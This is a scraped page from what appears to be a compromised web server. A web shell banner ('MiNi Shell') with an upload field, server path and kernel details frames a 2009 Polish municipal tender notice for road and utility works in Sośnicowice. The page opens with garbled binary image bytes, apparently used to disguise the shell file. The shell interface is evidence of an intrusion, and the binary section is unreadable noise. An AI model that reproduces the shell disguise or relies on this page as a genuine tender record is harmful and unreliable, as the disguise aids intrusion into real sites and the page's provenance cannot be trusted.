JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090116/18901-N-2009.html

<p class="kh_header"><b>Sośnicowice: Budowa drogi gminnej oraz infrastruktury wodociągowo-kanalizacyjnej dla terenów przy ulicy Gimnazjalnej w Sośnicowicach.</b><br>
<b>Numer ogłoszenia: 18901 - 2009; data zamieszczenia: 16.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sośnicowice , Rynek 19, 44-153 Sośnicowice, woj. śląskie, tel. 032 2387191 w. 330, faks 032 2387550.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sosnicowice.i-gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa drogi gminnej oraz infrastruktury wodociągowo-kanalizacyjnej dla terenów przy ulicy Gimnazjalnej w Sośnicowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Roboty objęte finansowaniem ze środków budżetu gminy i środków budżetu  
               Państwa w  ramach Narodowego Programu Przebudowy Dróg Lokalnych  2008-2011
               
Zakres  rzeczowy -  roboty drogowe:
-    krawężnik betonowy 15 x 30 cm na podsypce 
cementowo-piaskowej                                                      -        588 m
-   krawęznik betonowy 15x30 cm na ławie betonowej            -        570 m
-    krawężnik betonowy 20x30 cm na ławie betonowej           -          30 m

-    nawierzchnia z kostki brukowej betonowej gr. 8 cm            -    1 191 m2
( droga)
-    nawierzchnia z kostki brukowej betonowej gr. 8 cm           -       510 m2 
(chodnik)
-	naw. z miesz. min.-bit. grys. w-wa wiążąca gr. 4 cm    -       267 m2 
-	naw. z miesz. min.-bit. grys. w-wa ścieralna gr. 3 cm   -       267 m2

Zakres rzeczowy  -  kanalizacja deszczowa, odwodnienie drogi
-   wykonanie kanalizacji deszczowej z rur PVC-U
      O 300 mm typu SDR34,                                                   -       259 mb
-   wykonanie kanalizacji deszczowej z rur PVC-U
      O 200 mm typu SDR34  ( przyłącza)                                  -       128 mb
-   wykonanie studni rewizyjnych z kręgów betonowych
     fi 1200 mm,                                                                   -         12 szt.
-   wykonanie drenażu francuskiego                                        -       69,5 mb
           
Zakres rzeczowy - oświetlenie drogi
-  roboty związane z ułożeniem kabla YAKY 4x35 
                         zasilającego projektowane oświetlenie terenu      -   270  mb
-  zainstalowanie słupów oświetlenia ulicznego             
                         wraz z oprawami                                            -       8 szt.

B. Roboty objęte finansowaniem ze środków budżetu gminy
Zakres  rzeczowy - sieć wodociągowa, sieć kanalizacji sanitarnej
- rury przewodowe wodociągowe O 160 z PE-HD                           -  316,5 m
- rury wodociągowe O 40 mm z PE                                              -     88,5 m
- rury przewodowe kanalizacji sanitarnej O 200 z PVC         
                                                           281 mb + ( 127 m)        -    408 m
- rury przewodowe kanalizacji deszczowej O 200 z PVC                   -   128 m.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.22-1, 45.23.13.00-8, 45.23.14.00-9, 45.23.21.30-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości  36 000  PLN ( trzydzieści sześć tysięcy złotych).  
Wadium powinno być wniesione najpóźniej do dnia 05.02.2009 r. do godz. 9,00
Wadium może być wniesione w jednej lub w kilku formach:
1)	pieniądzu
2)	poręczeniach bankowych lub poręczeniach SKOK, z tym że poręczenie kasy jest zawsze poręczniem pieniężnym
3)	gwarancjach bankowych
4)	gwarancjach ubezpieczeniowych
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 5 pkt 3 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 z poź. zm.)
Wadium wniesione w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego na konto Bank Spółdzielczy w Sośnicowicach 54 8460 0008 2001 0000 0909 0002 z zaznaczeniem: 
Budowa drogi gminnej oraz infrastruktury wodociagowo-kanalizacyjnej dla terenów przy ul. Gimnazjalnej w Sośnicowicach
Zamawiający zwraca wadium niezwłocznie, jeżeli:
1)	upłynął termin związania oferta,
2)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
3)	zamawiający unieważnił postępowanie o udzielenie zamówienia , a protesty zostaly ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
1)	który wycofał ofertę przed upływem terminu składania ofert,
2)	który został wykluczony z postępowania,
3)	którego oferta została odrzucona
Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta zostala wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
       a)   posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy    
                              nakładają obowiązek posiadania takich uprawnień;  
      b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
                             i osobami zdolnymi do wykonania Zamówienia lub przedstawią pisemne zobowiązanie innych    
                             podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
-	                                                                            c)   znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia;
-	                                                                            d)   nie podlegają wykluczeniu z postępowania, zgodnie z art. 24 Ustawy.
2.  Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu:
a)	Wykonawca dysponuje osobami posiadającymi uprawnienia budowlane wykonawcze w zakresie robót drogowych, robót kanalizacyjnych,robót wodociągowych, robót elektrycznych ,które to osoby są członkami Okręgowej Izby Inżynierów Budownictwa.
b)	Wykonawca wykonał w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy to tym okresie, co najmniej 1 robotę w zakresie nawierzchni drogowych z kostki betonowej i  mas mineralno-asfaltowych ,1 robotę w zakresie budowy kanalizacji deszczowej lub sanitarnej,1 robotę w zakresie budowy sieci wodociągowych, 1 robotę w zakresie oświetlenia ulicznego bądź budowy kablowych linii energetycznych.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (art.23 Pzp)
Podmioty występujące wspólnie muszą ustanowić i wskazać Pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu 
o udzielenie niniejszego zamówienia i zawarcie umowy w sprawie zamówienia publicznego (zgodnie z art. 23 ust.2 Pzp).
W przypadku oferty składanej przez konsorcjum, Zamawiający, dokonując oceny, czy konsorcjum spełnia wymagania określone w SIWZ, uwzględni uprawnienia, posiadaną wiedzę i doświadczenie, potencjał techniczny, personel oraz sytuację ekonomiczną i finansową członków konsorcjum - wielkości stanowiące o spełnieniu warunków będą zsumowane. W związku z powyższym, wraz 
z ofertą członkowie konsorcjum mogą złożyć jeden komplet dokumentów na potwierdzenie warunków, o których mowa w punkcie IV ppkt 2) SIWZ.
Do oferty powinny zostać załączone dokumenty wskazane w punkcie V ppkt 1 i 3, przygotowane odrębnie w odniesieniu do każdego z członków konsorcjum.
Wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie Umowy zgodnie z jej postanowieniami.
Nie spełnienie powyższych wymagań spowoduje wykluczenie oferty konsorcjum. 
Ocena spełniania warunków nastąpi w oparciu o dołączone do oferty dokumenty na zasadzie  spełnia ; nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu

1)	aktualny odpis z rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ,
       O aktualności dokumentu decyduje wyłącznie data jego wystawienia, a nie data potwierdzenia jego  
       aktualizacji.

2)	oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art. 22 ust. 1 pkt 1-3 - (załącznik nr 2),
3)	oświadczenie o tym, że Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia w zakresie art. 22 ust. 1 pkt 4 (załącznik nr 3),
4)	wykaz wykonywanych w okresie ostatnich 5 lat robót  budowlanych (załącznik nr 4) wraz z dokumentami potwierdzającymi, że wykazane roboty zostały wykonane z należytą starannościa,
5)	wykaz osób, które będą uczestniczyć w realizacji zamówienia, (załącznik nr 5),
6)	uprawnienia zawodowe i aktualnie obowiązujące zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa,
7)	parafowany wzór umowy - (załącznik nr 6),

Dokumenty wymienione w punkcie V mogą być przedstawione w formie oryginału 
lub kserokopii poświadczonej za zgodność z oryginałem przez osobę/y uprawnioną/e 
do reprezentowania Wykonawcy. 

Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty zgodnie z przepisami rozporządzenia wykonawczego do ustawy Pzp w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (rozporządzenie Prezesa Rady Ministrów  z dnia 19 maja 2006 r.  Dz..U. Nr 87, poz. 605 z późn. zm.).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sosnicowice.i-gmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sośnicowicach
ul. Rynek 19, 44-153 Sośnicowice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2009 godzina 10:00, miejsce: Urząd Miejski w Sośnicowicach
ul. Rynek 19, 44-153 Sośnicowice
Sekretariat, pokój Nr 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com